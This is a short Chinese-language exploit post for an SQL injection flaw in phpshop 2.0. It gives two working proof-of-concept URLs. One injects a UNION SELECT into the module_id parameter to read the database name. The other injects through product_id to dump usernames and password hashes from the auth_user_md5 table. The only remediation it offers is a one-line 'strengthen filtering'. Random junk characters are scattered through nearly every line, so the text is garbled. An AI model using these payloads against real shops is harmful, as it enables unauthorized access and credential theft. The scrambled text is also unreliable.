标题 : phpshop 2.0 SQL Injection Vulnerability4 l; ~4 m Z6 n5 |- b
6 o. O, E1 K4 y+ m
作者 : By onestree- `5 y* R8 c; Q
下载地址 : http://code.google.com/p/phpshop/downloads/list7 }7 a8 B# u/ U+ a" r: M
测试地址: windows 7 / ubuntu" z6 _3 i) w9 ~( g+ T
5 o% u. P) W2 D8 E# X R }
5 I) E% u3 T% S9 `
SQLi p0c: G$ q( ?9 j3 P5 E) d# ~/ |
* d* k |1 X& Z' r1 i; m3 B1 E==================; {2 l2 J/ M6 @( h
. _# y4 R0 Z7 x7 `6 Z: Dhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11') h5 O. k& B1 `$ i% D
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
9 e9 Z( _$ B; q: Z* B # Z& z! ?+ _. W7 T* ]# C7 u4 \
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
% `3 h" A+ x; t' ]# e3 O3 p( P$ I) {, i, B' q8 Z5 c, e% K
修复:
) c, [. N8 W; B4 M# ^加强过滤2 k# \6 Q8 p. ~0 [( ~
5 h. m/ ?# e% L2 o0 h
l* P/ j6 l& U: w# G |